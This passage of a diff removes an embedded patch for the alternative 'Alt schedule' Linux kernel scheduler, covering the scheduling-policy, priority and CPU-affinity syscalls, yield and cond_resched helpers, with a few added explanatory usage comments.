-+		unsigned long rlim_rtprio = task_rlimit(p, RLIMIT_RTPRIO);
-+
-+		/* Can't set/change the rt policy: */
-+		if (policy != p->policy && !rlim_rtprio)
-+			goto req_priv;
-+
-+		/* Can't increase priority: */
-+		if (attr->sched_priority > p->rt_priority &&
-+		    attr->sched_priority > rlim_rtprio)
-+			goto req_priv;
-+	}
-+
-+	/* Can't change other user's priorities: */
-+	if (!check_same_owner(p))
-+		goto req_priv;
-+
-+	/* Normal users shall not reset the sched_reset_on_fork flag: */
-+	if (p->sched_reset_on_fork && !reset_on_fork)
-+		goto req_priv;
-+
-+	return 0;
-+
-+req_priv:
-+	if (!capable(CAP_SYS_NICE))
-+		return -EPERM;
-+
-+	return 0;
-+}
-+
-+static int __sched_setscheduler(struct task_struct *p,
-+				const struct sched_attr *attr,
-+				bool user, bool pi)
-+{
-+	const struct sched_attr dl_squash_attr = {
-+		.size		= sizeof(struct sched_attr),
-+		.sched_policy	= SCHED_FIFO,
-+		.sched_nice	= 0,
-+		.sched_priority = 99,
-+	};
-+	int oldpolicy = -1, policy = attr->sched_policy;
-+	int retval, newprio;
-+	struct balance_callback *head;
-+	unsigned long flags;
-+	struct rq *rq;
-+	int reset_on_fork;
-+	raw_spinlock_t *lock;
-+
-+	/* The pi code expects interrupts enabled */
-+	BUG_ON(pi && in_interrupt());
-+
-+	/*
-+	 * Alt schedule FW supports SCHED_DEADLINE by squashing it into prio-0 SCHED_FIFO
-+	 */
-+	if (unlikely(SCHED_DEADLINE == policy)) {
-+		attr = &dl_squash_attr;
-+		policy = attr->sched_policy;
-+	}
-+recheck:
-+	/* Double check policy once rq lock held */
-+	if (policy < 0) {
-+		reset_on_fork = p->sched_reset_on_fork;
-+		policy = oldpolicy = p->policy;
-+	} else {
-+		reset_on_fork = !!(attr->sched_flags & SCHED_RESET_ON_FORK);
-+
-+		if (policy > SCHED_IDLE)
-+			return -EINVAL;
-+	}
-+
-+	if (attr->sched_flags & ~(SCHED_FLAG_ALL))
-+		return -EINVAL;
-+
-+	/*
-+	 * Valid priorities for SCHED_FIFO and SCHED_RR are
-+	 * 1..MAX_RT_PRIO-1, valid priority for SCHED_NORMAL and
-+	 * SCHED_BATCH and SCHED_IDLE is 0.
-+	 */
-+	if (attr->sched_priority < 0 ||
-+	    (p->mm && attr->sched_priority > MAX_RT_PRIO - 1) ||
-+	    (!p->mm && attr->sched_priority > MAX_RT_PRIO - 1))
-+		return -EINVAL;
-+	if ((SCHED_RR == policy || SCHED_FIFO == policy) !=
-+	    (attr->sched_priority != 0))
-+		return -EINVAL;
-+
-+	if (user) {
-+		retval = user_check_sched_setscheduler(p, attr, policy, reset_on_fork);
-+		if (retval)
-+			return retval;
-+
-+		retval = security_task_setscheduler(p);
-+		if (retval)
-+			return retval;
-+	}
-+
-+	if (pi)
-+		cpuset_read_lock();
-+
-+	/*
-+	 * Make sure no PI-waiters arrive (or leave) while we are
-+	 * changing the priority of the task:
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+
-+	/*
-+	 * To be able to change p->policy safely, task_access_lock()
-+	 * must be called.
-+	 * If task_access_lock() is used here: for a task p which is
-+	 * not running, reading rq->stop is racy but acceptable, as
-+	 * ->stop doesn't change much.
-+	 * An enhancement could be made to read rq->stop safely.
-+	 */
-+	rq = __task_access_lock(p, &lock);
-+
-+	/*
-+	 * Changing the policy of the stop thread is a very bad idea
-+	 */
-+	if (p == rq->stop) {
-+		retval = -EINVAL;
-+		goto unlock;
-+	}
-+
-+	/*
-+	 * If not changing anything there's no need to proceed further:
-+	 */
-+	if (unlikely(policy == p->policy)) {
-+		if (rt_policy(policy) && attr->sched_priority != p->rt_priority)
-+			goto change;
-+		if (!rt_policy(policy) &&
-+		    NICE_TO_PRIO(attr->sched_nice) != p->static_prio)
-+			goto change;
-+
-+		p->sched_reset_on_fork = reset_on_fork;
-+		retval = 0;
-+		goto unlock;
-+	}
-+change:
-+
-+	/* Re-check policy now with rq lock held */
-+	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
-+		policy = oldpolicy = -1;
-+		__task_access_unlock(p, lock);
-+		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+		if (pi)
-+			cpuset_read_unlock();
-+		goto recheck;
-+	}
-+
-+	p->sched_reset_on_fork = reset_on_fork;
-+
-+	newprio = __normal_prio(policy, attr->sched_priority, NICE_TO_PRIO(attr->sched_nice));
-+	if (pi) {
-+		/*
-+		 * Take priority boosted tasks into account. If the new
-+		 * effective priority is unchanged, we just store the new
-+		 * normal parameters and do not touch the scheduler class and
-+		 * the runqueue. This will be done when the task deboosts
-+		 * itself.
-+		 */
-+		newprio = rt_effective_prio(p, newprio);
-+	}
-+
-+	if (!(attr->sched_flags & SCHED_FLAG_KEEP_PARAMS)) {
-+		__setscheduler_params(p, attr);
-+		__setscheduler_prio(p, newprio);
-+	}
-+
-+	check_task_changed(p, rq);
-+
-+	/* Avoid rq from going away on us: */
-+	preempt_disable();
-+	head = splice_balance_callbacks(rq);
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	if (pi) {
-+		cpuset_read_unlock();
-+		rt_mutex_adjust_pi(p);
-+	}
-+
-+	/* Run balance callbacks after we've adjusted the PI chain: */
-+	balance_callbacks(rq, head);
-+	preempt_enable();
-+
-+	return 0;
-+
-+unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+	if (pi)
-+		cpuset_read_unlock();
-+	return retval;
-+}
-+
-+static int _sched_setscheduler(struct task_struct *p, int policy,
-+			       const struct sched_param *param, bool check)
-+{
-+	struct sched_attr attr = {
-+		.sched_policy   = policy,
-+		.sched_priority = param->sched_priority,
-+		.sched_nice     = PRIO_TO_NICE(p->static_prio),
-+	};
-+
-+	/* Fixup the legacy SCHED_RESET_ON_FORK hack. */
-+	if ((policy != SETPARAM_POLICY) && (policy & SCHED_RESET_ON_FORK)) {
-+		attr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
-+		policy &= ~SCHED_RESET_ON_FORK;
-+		attr.sched_policy = policy;
-+	}
-+
-+	return __sched_setscheduler(p, &attr, check, true);
-+}
-+
-+/**
-+ * sched_setscheduler - change the scheduling policy and/or RT priority of a thread.
-+ * @p: the task in question.
-+ * @policy: new policy.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Use sched_set_fifo(), read its comment.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ *
-+ * NOTE that the task may be already dead.
-+ */
-+int sched_setscheduler(struct task_struct *p, int policy,
-+		       const struct sched_param *param)
-+{
-+	return _sched_setscheduler(p, policy, param, true);
-+}
-+
-+int sched_setattr(struct task_struct *p, const struct sched_attr *attr)
-+{
-+	return __sched_setscheduler(p, attr, true, true);
-+}
-+
-+int sched_setattr_nocheck(struct task_struct *p, const struct sched_attr *attr)
-+{
-+	return __sched_setscheduler(p, attr, false, true);
-+}
-+EXPORT_SYMBOL_GPL(sched_setattr_nocheck);
-+
-+/**
-+ * sched_setscheduler_nocheck - change the scheduling policy and/or RT priority of a thread from kernelspace.
-+ * @p: the task in question.
-+ * @policy: new policy.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Just like sched_setscheduler, only don't bother checking if the
-+ * current context has permission.  For example, this is needed in
-+ * stop_machine(): we create temporary high priority worker threads,
-+ * but our caller might not have that capability.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+int sched_setscheduler_nocheck(struct task_struct *p, int policy,
-+			       const struct sched_param *param)
-+{
-+	return _sched_setscheduler(p, policy, param, false);
-+}
-+
-+/*
-+ * SCHED_FIFO is a broken scheduler model; that is, it is fundamentally
-+ * incapable of resource management, which is the one thing an OS really should
-+ * be doing.
-+ *
-+ * This is of course the reason it is limited to privileged users only.
-+ *
-+ * Worse still, it is fundamentally impossible to compose static priority
-+ * workloads. You cannot take two correctly working static prio workloads
-+ * and smash them together and still expect them to work.
-+ *
-+ * For this reason 'all' FIFO tasks the kernel creates are basically at:
-+ *
-+ *   MAX_RT_PRIO / 2
-+ *
-+ * The administrator _MUST_ configure the system, the kernel simply doesn't
-+ * know enough information to make a sensible choice.
-+ */
-+void sched_set_fifo(struct task_struct *p)
-+{
-+	struct sched_param sp = { .sched_priority = MAX_RT_PRIO / 2 };
-+	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_fifo);
-+
-+/*
-+ * For when you don't much care about FIFO, but want to be above SCHED_NORMAL.
-+ */
-+void sched_set_fifo_low(struct task_struct *p)
-+{
-+	struct sched_param sp = { .sched_priority = 1 };
-+	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_fifo_low);
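-+
-+/*
-+ * Editor's usage sketch (illustrative, not part of the original patch;
-+ * my_fn and "my_worker" are hypothetical): a driver wanting a kthread
-+ * above SCHED_NORMAL but below serious RT work might do:
-+ *
-+ *	struct task_struct *t = kthread_create(my_fn, NULL, "my_worker");
-+ *
-+ *	if (!IS_ERR(t)) {
-+ *		sched_set_fifo_low(t);
-+ *		wake_up_process(t);
-+ *	}
-+ */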
-+
-+void sched_set_normal(struct task_struct *p, int nice)
-+{
-+	struct sched_attr attr = {
-+		.sched_policy = SCHED_NORMAL,
-+		.sched_nice = nice,
-+	};
-+	WARN_ON_ONCE(sched_setattr_nocheck(p, &attr) != 0);
-+}
-+EXPORT_SYMBOL_GPL(sched_set_normal);
-+
-+static int
-+do_sched_setscheduler(pid_t pid, int policy, struct sched_param __user *param)
-+{
-+	struct sched_param lparam;
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!param || pid < 0)
-+		return -EINVAL;
-+	if (copy_from_user(&lparam, param, sizeof(struct sched_param)))
-+		return -EFAULT;
-+
-+	rcu_read_lock();
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (likely(p))
-+		get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (likely(p)) {
-+		retval = sched_setscheduler(p, policy, &lparam);
-+		put_task_struct(p);
-+	}
-+
-+	return retval;
-+}
-+
-+/*
-+ * Mimics kernel/events/core.c perf_copy_attr().
-+ */
-+static int sched_copy_attr(struct sched_attr __user *uattr, struct sched_attr *attr)
-+{
-+	u32 size;
-+	int ret;
-+
-+	/* Zero the full structure, so that a short copy will be nice: */
-+	memset(attr, 0, sizeof(*attr));
-+
-+	ret = get_user(size, &uattr->size);
-+	if (ret)
-+		return ret;
-+
-+	/* ABI compatibility quirk: */
-+	if (!size)
-+		size = SCHED_ATTR_SIZE_VER0;
-+
-+	if (size < SCHED_ATTR_SIZE_VER0 || size > PAGE_SIZE)
-+		goto err_size;
-+
-+	ret = copy_struct_from_user(attr, sizeof(*attr), uattr, size);
-+	if (ret) {
-+		if (ret == -E2BIG)
-+			goto err_size;
-+		return ret;
-+	}
-+
-+	/*
-+	 * XXX: Do we want to be lenient like existing syscalls; or do we want
-+	 * to be strict and return an error on out-of-bounds values?
-+	 */
-+	attr->sched_nice = clamp(attr->sched_nice, -20, 19);
-+
-+	/* sched/core.c uses zero here but we already know ret is zero */
-+	return 0;
-+
-+err_size:
-+	put_user(sizeof(*attr), &uattr->size);
-+	return -E2BIG;
-+}
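-+
-+/*
-+ * Editor's note (illustrative, not part of the original patch): an old
-+ * binary passing size == SCHED_ATTR_SIZE_VER0 (48 bytes) still works,
-+ * since copy_struct_from_user() zero-fills the tail of the kernel
-+ * struct; -E2BIG is only returned for a user buffer that is larger
-+ * than the kernel's and has non-zero trailing bytes.
-+ */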
-+
-+/**
-+ * sys_sched_setscheduler - set/change the scheduler policy and RT priority
-+ * @pid: the pid in question.
-+ * @policy: new policy.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+SYSCALL_DEFINE3(sched_setscheduler, pid_t, pid, int, policy, struct sched_param __user *, param)
-+{
-+	if (policy < 0)
-+		return -EINVAL;
-+
-+	return do_sched_setscheduler(pid, policy, param);
-+}
-+
-+/**
-+ * sys_sched_setparam - set/change the RT priority of a thread
-+ * @pid: the pid in question.
-+ * @param: structure containing the new RT priority.
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+SYSCALL_DEFINE2(sched_setparam, pid_t, pid, struct sched_param __user *, param)
-+{
-+	return do_sched_setscheduler(pid, SETPARAM_POLICY, param);
-+}
-+
-+/**
-+ * sys_sched_setattr - same as above, but with extended sched_attr
-+ * @pid: the pid in question.
-+ * @uattr: structure containing the extended parameters.
-+ * @flags: for future extension.
-+ */
-+SYSCALL_DEFINE3(sched_setattr, pid_t, pid, struct sched_attr __user *, uattr,
-+			       unsigned int, flags)
-+{
-+	struct sched_attr attr;
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!uattr || pid < 0 || flags)
-+		return -EINVAL;
-+
-+	retval = sched_copy_attr(uattr, &attr);
-+	if (retval)
-+		return retval;
-+
-+	if ((int)attr.sched_policy < 0)
-+		return -EINVAL;
-+
-+	rcu_read_lock();
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (likely(p))
-+		get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (likely(p)) {
-+		retval = sched_setattr(p, &attr);
-+		put_task_struct(p);
-+	}
-+
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getscheduler - get the policy (scheduling class) of a thread
-+ * @pid: the pid in question.
-+ *
-+ * Return: On success, the policy of the thread. Otherwise, a negative error
-+ * code.
-+ */
-+SYSCALL_DEFINE1(sched_getscheduler, pid_t, pid)
-+{
-+	struct task_struct *p;
-+	int retval = -EINVAL;
-+
-+	if (pid < 0)
-+		goto out_nounlock;
-+
-+	retval = -ESRCH;
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	if (p) {
-+		retval = security_task_getscheduler(p);
-+		if (!retval)
-+			retval = p->policy;
-+	}
-+	rcu_read_unlock();
-+
-+out_nounlock:
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getparam - get the RT priority of a thread
-+ * @pid: the pid in question.
-+ * @param: structure containing the RT priority.
-+ *
-+ * Return: On success, 0 and the RT priority is in @param. Otherwise, an error
-+ * code.
-+ */
-+SYSCALL_DEFINE2(sched_getparam, pid_t, pid, struct sched_param __user *, param)
-+{
-+	struct sched_param lp = { .sched_priority = 0 };
-+	struct task_struct *p;
-+	int retval = -EINVAL;
-+
-+	if (!param || pid < 0)
-+		goto out_nounlock;
-+
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	retval = -ESRCH;
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	if (task_has_rt_policy(p))
-+		lp.sched_priority = p->rt_priority;
-+	rcu_read_unlock();
-+
-+	/*
-+	 * This one might sleep, we cannot do it with a spinlock held ...
-+	 */
-+	retval = copy_to_user(param, &lp, sizeof(*param)) ? -EFAULT : 0;
-+
-+out_nounlock:
-+	return retval;
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+/*
-+ * Copy the kernel size attribute structure (which might be larger
-+ * than what user-space knows about) to user-space.
-+ *
-+ * Note that all cases are valid: user-space buffer can be larger or
-+ * smaller than the kernel-space buffer. The usual case is that both
-+ * have the same size.
-+ */
-+static int
-+sched_attr_copy_to_user(struct sched_attr __user *uattr,
-+			struct sched_attr *kattr,
-+			unsigned int usize)
-+{
-+	unsigned int ksize = sizeof(*kattr);
-+
-+	if (!access_ok(uattr, usize))
-+		return -EFAULT;
-+
-+	/*
-+	 * sched_getattr() ABI forwards and backwards compatibility:
-+	 *
-+	 * If usize == ksize then we just copy everything to user-space and all is good.
-+	 *
-+	 * If usize < ksize then we only copy as much as user-space has space for,
-+	 * this keeps ABI compatibility as well. We skip the rest.
-+	 *
-+	 * If usize > ksize then user-space is using a newer version of the ABI,
-+	 * parts of which the kernel doesn't know about. Just ignore it - tooling can
-+	 * detect the kernel's knowledge of attributes from the attr->size value
-+	 * which is set to ksize in this case.
-+	 */
-+	kattr->size = min(usize, ksize);
-+
-+	if (copy_to_user(uattr, kattr, kattr->size))
-+		return -EFAULT;
-+
-+	return 0;
-+}
-+
-+/**
-+ * sys_sched_getattr - similar to sched_getparam, but with sched_attr
-+ * @pid: the pid in question.
-+ * @uattr: structure containing the extended parameters.
-+ * @usize: sizeof(attr) for fwd/bwd comp.
-+ * @flags: for future extension.
-+ */
-+SYSCALL_DEFINE4(sched_getattr, pid_t, pid, struct sched_attr __user *, uattr,
-+		unsigned int, usize, unsigned int, flags)
-+{
-+	struct sched_attr kattr = { };
-+	struct task_struct *p;
-+	int retval;
-+
-+	if (!uattr || pid < 0 || usize > PAGE_SIZE ||
-+	    usize < SCHED_ATTR_SIZE_VER0 || flags)
-+		return -EINVAL;
-+
-+	rcu_read_lock();
-+	p = find_process_by_pid(pid);
-+	retval = -ESRCH;
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	kattr.sched_policy = p->policy;
-+	if (p->sched_reset_on_fork)
-+		kattr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
-+	if (task_has_rt_policy(p))
-+		kattr.sched_priority = p->rt_priority;
-+	else
-+		kattr.sched_nice = task_nice(p);
-+	kattr.sched_flags &= SCHED_FLAG_ALL;
-+
-+#ifdef CONFIG_UCLAMP_TASK
-+	kattr.sched_util_min = p->uclamp_req[UCLAMP_MIN].value;
-+	kattr.sched_util_max = p->uclamp_req[UCLAMP_MAX].value;
-+#endif
-+
-+	rcu_read_unlock();
-+
-+	return sched_attr_copy_to_user(uattr, &kattr, usize);
-+
-+out_unlock:
-+	rcu_read_unlock();
-+	return retval;
-+}
-+
-+#ifdef CONFIG_SMP
-+int dl_task_check_affinity(struct task_struct *p, const struct cpumask *mask)
-+{
-+	return 0;
-+}
-+#endif
-+
-+static int
-+__sched_setaffinity(struct task_struct *p, const struct cpumask *mask)
-+{
-+	int retval;
-+	cpumask_var_t cpus_allowed, new_mask;
-+
-+	if (!alloc_cpumask_var(&cpus_allowed, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL)) {
-+		retval = -ENOMEM;
-+		goto out_free_cpus_allowed;
-+	}
-+
-+	cpuset_cpus_allowed(p, cpus_allowed);
-+	cpumask_and(new_mask, mask, cpus_allowed);
-+again:
-+	retval = __set_cpus_allowed_ptr(p, new_mask, SCA_CHECK | SCA_USER);
-+	if (retval)
-+		goto out_free_new_mask;
-+
-+	cpuset_cpus_allowed(p, cpus_allowed);
-+	if (!cpumask_subset(new_mask, cpus_allowed)) {
-+		/*
-+		 * We must have raced with a concurrent cpuset
-+		 * update. Just reset the cpus_allowed to the
-+		 * cpuset's cpus_allowed.
-+		 */
-+		cpumask_copy(new_mask, cpus_allowed);
-+		goto again;
-+	}
-+
-+out_free_new_mask:
-+	free_cpumask_var(new_mask);
-+out_free_cpus_allowed:
-+	free_cpumask_var(cpus_allowed);
-+	return retval;
-+}
-+
-+long sched_setaffinity(pid_t pid, const struct cpumask *in_mask)
-+{
-+	struct task_struct *p;
-+	int retval;
-+
-+	rcu_read_lock();
-+
-+	p = find_process_by_pid(pid);
-+	if (!p) {
-+		rcu_read_unlock();
-+		return -ESRCH;
-+	}
-+
-+	/* Prevent p going away */
-+	get_task_struct(p);
-+	rcu_read_unlock();
-+
-+	if (p->flags & PF_NO_SETAFFINITY) {
-+		retval = -EINVAL;
-+		goto out_put_task;
-+	}
-+
-+	if (!check_same_owner(p)) {
-+		rcu_read_lock();
-+		if (!ns_capable(__task_cred(p)->user_ns, CAP_SYS_NICE)) {
-+			rcu_read_unlock();
-+			retval = -EPERM;
-+			goto out_put_task;
-+		}
-+		rcu_read_unlock();
-+	}
-+
-+	retval = security_task_setscheduler(p);
-+	if (retval)
-+		goto out_put_task;
-+
-+	retval = __sched_setaffinity(p, in_mask);
-+out_put_task:
-+	put_task_struct(p);
-+	return retval;
-+}
-+
-+static int get_user_cpu_mask(unsigned long __user *user_mask_ptr, unsigned len,
-+			     struct cpumask *new_mask)
-+{
-+	if (len < cpumask_size())
-+		cpumask_clear(new_mask);
-+	else if (len > cpumask_size())
-+		len = cpumask_size();
-+
-+	return copy_from_user(new_mask, user_mask_ptr, len) ? -EFAULT : 0;
-+}
-+
-+/**
-+ * sys_sched_setaffinity - set the CPU affinity of a process
-+ * @pid: pid of the process
-+ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
-+ * @user_mask_ptr: user-space pointer to the new CPU mask
-+ *
-+ * Return: 0 on success. An error code otherwise.
-+ */
-+SYSCALL_DEFINE3(sched_setaffinity, pid_t, pid, unsigned int, len,
-+		unsigned long __user *, user_mask_ptr)
-+{
-+	cpumask_var_t new_mask;
-+	int retval;
-+
-+	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	retval = get_user_cpu_mask(user_mask_ptr, len, new_mask);
-+	if (retval == 0)
-+		retval = sched_setaffinity(pid, new_mask);
-+	free_cpumask_var(new_mask);
-+	return retval;
-+}
-+
-+long sched_getaffinity(pid_t pid, cpumask_t *mask)
-+{
-+	struct task_struct *p;
-+	raw_spinlock_t *lock;
-+	unsigned long flags;
-+	int retval;
-+
-+	rcu_read_lock();
-+
-+	retval = -ESRCH;
-+	p = find_process_by_pid(pid);
-+	if (!p)
-+		goto out_unlock;
-+
-+	retval = security_task_getscheduler(p);
-+	if (retval)
-+		goto out_unlock;
-+
-+	task_access_lock_irqsave(p, &lock, &flags);
-+	cpumask_and(mask, &p->cpus_mask, cpu_active_mask);
-+	task_access_unlock_irqrestore(p, lock, &flags);
-+
-+out_unlock:
-+	rcu_read_unlock();
-+
-+	return retval;
-+}
-+
-+/**
-+ * sys_sched_getaffinity - get the CPU affinity of a process
-+ * @pid: pid of the process
-+ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
-+ * @user_mask_ptr: user-space pointer to hold the current CPU mask
-+ *
-+ * Return: size of CPU mask copied to user_mask_ptr on success. An
-+ * error code otherwise.
-+ */
-+SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
-+		unsigned long __user *, user_mask_ptr)
-+{
-+	int ret;
-+	cpumask_var_t mask;
-+
-+	if ((len * BITS_PER_BYTE) < nr_cpu_ids)
-+		return -EINVAL;
-+	if (len & (sizeof(unsigned long)-1))
-+		return -EINVAL;
-+
-+	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
-+		return -ENOMEM;
-+
-+	ret = sched_getaffinity(pid, mask);
-+	if (ret == 0) {
-+		unsigned int retlen = min_t(size_t, len, cpumask_size());
-+
-+		if (copy_to_user(user_mask_ptr, mask, retlen))
-+			ret = -EFAULT;
-+		else
-+			ret = retlen;
-+	}
-+	free_cpumask_var(mask);
-+
-+	return ret;
-+}
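-+
-+/*
-+ * Editor's note (illustrative, not part of the original patch): unlike
-+ * the glibc wrapper, the raw syscall returns the number of bytes
-+ * copied; e.g. on a kernel with NR_CPUS <= 64, a call with len == 128
-+ * succeeds and returns cpumask_size() == 8 rather than 0.
-+ */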
-+
-+static void do_sched_yield(void)
-+{
-+	struct rq *rq;
-+	struct rq_flags rf;
-+
-+	if (!sched_yield_type)
-+		return;
-+
-+	rq = this_rq_lock_irq(&rf);
-+
-+	schedstat_inc(rq->yld_count);
-+
-+	if (1 == sched_yield_type) {
-+		if (!rt_task(current))
-+			do_sched_yield_type_1(current, rq);
-+	} else if (2 == sched_yield_type) {
-+		if (rq->nr_running > 1)
-+			rq->skip = current;
-+	}
-+
-+	preempt_disable();
-+	raw_spin_unlock_irq(&rq->lock);
-+	sched_preempt_enable_no_resched();
-+
-+	schedule();
-+}
-+
-+/**
-+ * sys_sched_yield - yield the current processor to other threads.
-+ *
-+ * This function yields the current CPU to other tasks. If there are no
-+ * other threads running on this CPU then this function will return.
-+ *
-+ * Return: 0.
-+ */
-+SYSCALL_DEFINE0(sched_yield)
-+{
-+	do_sched_yield();
-+	return 0;
-+}
-+
-+#if !defined(CONFIG_PREEMPTION) || defined(CONFIG_PREEMPT_DYNAMIC)
-+int __sched __cond_resched(void)
-+{
-+	if (should_resched(0)) {
-+		preempt_schedule_common();
-+		return 1;
-+	}
-+	/*
-+	 * In preemptible kernels, ->rcu_read_lock_nesting tells the tick
-+	 * whether the current CPU is in an RCU read-side critical section,
-+	 * so the tick can report quiescent states even for CPUs looping
-+	 * in kernel context.  In contrast, in non-preemptible kernels,
-+	 * RCU readers leave no in-memory hints, which means that CPU-bound
-+	 * processes executing in kernel context might never report an
-+	 * RCU quiescent state.  Therefore, the following code causes
-+	 * cond_resched() to report a quiescent state, but only when RCU
-+	 * is in urgent need of one.
-+	 */
-+#ifndef CONFIG_PREEMPT_RCU
-+	rcu_all_qs();
-+#endif
-+	return 0;
-+}
-+EXPORT_SYMBOL(__cond_resched);
-+#endif
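-+
-+/*
-+ * Editor's usage sketch (illustrative, not part of the original patch;
-+ * process_one() and items[] are hypothetical): long kernel-side loops
-+ * typically drop in one reschedule point per iteration:
-+ *
-+ *	for (i = 0; i < nr_items; i++) {
-+ *		process_one(items[i]);
-+ *		cond_resched();
-+ *	}
-+ */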
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#define cond_resched_dynamic_enabled	__cond_resched
-+#define cond_resched_dynamic_disabled	((void *)&__static_call_return0)
-+DEFINE_STATIC_CALL_RET0(cond_resched, __cond_resched);
-+EXPORT_STATIC_CALL_TRAMP(cond_resched);
-+
-+#define might_resched_dynamic_enabled	__cond_resched
-+#define might_resched_dynamic_disabled	((void *)&__static_call_return0)
-+DEFINE_STATIC_CALL_RET0(might_resched, __cond_resched);
-+EXPORT_STATIC_CALL_TRAMP(might_resched);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_FALSE(sk_dynamic_cond_resched);
-+int __sched dynamic_cond_resched(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_cond_resched))
-+		return 0;
-+	return __cond_resched();
-+}
-+EXPORT_SYMBOL(dynamic_cond_resched);
-+
-+static DEFINE_STATIC_KEY_FALSE(sk_dynamic_might_resched);
-+int __sched dynamic_might_resched(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_might_resched))
-+		return 0;
-+	return __cond_resched();
-+}
-+EXPORT_SYMBOL(dynamic_might_resched);
-+#endif
-+#endif
-+
-+/*
-+ * __cond_resched_lock() - if a reschedule is pending, drop the given lock,
-+ * call schedule, and on return reacquire the lock.
-+ *
-+ * This works OK both with and without CONFIG_PREEMPTION.  We do strange low-level
-+ * operations here to prevent schedule() from being called twice (once via
-+ * spin_unlock(), once by hand).
-+ */
-+int __cond_resched_lock(spinlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held(lock);
-+
-+	if (spin_needbreak(lock) || resched) {
-+		spin_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		spin_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_lock);
-+
-+int __cond_resched_rwlock_read(rwlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held_read(lock);
-+
-+	if (rwlock_needbreak(lock) || resched) {
-+		read_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		read_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_rwlock_read);
-+
-+int __cond_resched_rwlock_write(rwlock_t *lock)
-+{
-+	int resched = should_resched(PREEMPT_LOCK_OFFSET);
-+	int ret = 0;
-+
-+	lockdep_assert_held_write(lock);
-+
-+	if (rwlock_needbreak(lock) || resched) {
-+		write_unlock(lock);
-+		if (!_cond_resched())
-+			cpu_relax();
-+		ret = 1;
-+		write_lock(lock);
-+	}
-+	return ret;
-+}
-+EXPORT_SYMBOL(__cond_resched_rwlock_write);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+
-+#ifdef CONFIG_GENERIC_ENTRY
-+#include <linux/entry-common.h>
-+#endif
-+
-+/*
-+ * SC:cond_resched
-+ * SC:might_resched
-+ * SC:preempt_schedule
-+ * SC:preempt_schedule_notrace
-+ * SC:irqentry_exit_cond_resched
-+ *
-+ *
-+ * NONE:
-+ *   cond_resched               <- __cond_resched
-+ *   might_resched              <- RET0
-+ *   preempt_schedule           <- NOP
-+ *   preempt_schedule_notrace   <- NOP
-+ *   irqentry_exit_cond_resched <- NOP
-+ *
-+ * VOLUNTARY:
-+ *   cond_resched               <- __cond_resched
-+ *   might_resched              <- __cond_resched
-+ *   preempt_schedule           <- NOP
-+ *   preempt_schedule_notrace   <- NOP
-+ *   irqentry_exit_cond_resched <- NOP
-+ *
-+ * FULL:
-+ *   cond_resched               <- RET0
-+ *   might_resched              <- RET0
-+ *   preempt_schedule           <- preempt_schedule
-+ *   preempt_schedule_notrace   <- preempt_schedule_notrace
-+ *   irqentry_exit_cond_resched <- irqentry_exit_cond_resched
-+ */
-+
-+enum {
-+	preempt_dynamic_undefined = -1,
-+	preempt_dynamic_none,
-+	preempt_dynamic_voluntary,
-+	preempt_dynamic_full,
-+};
-+
-+int preempt_dynamic_mode = preempt_dynamic_undefined;
-+
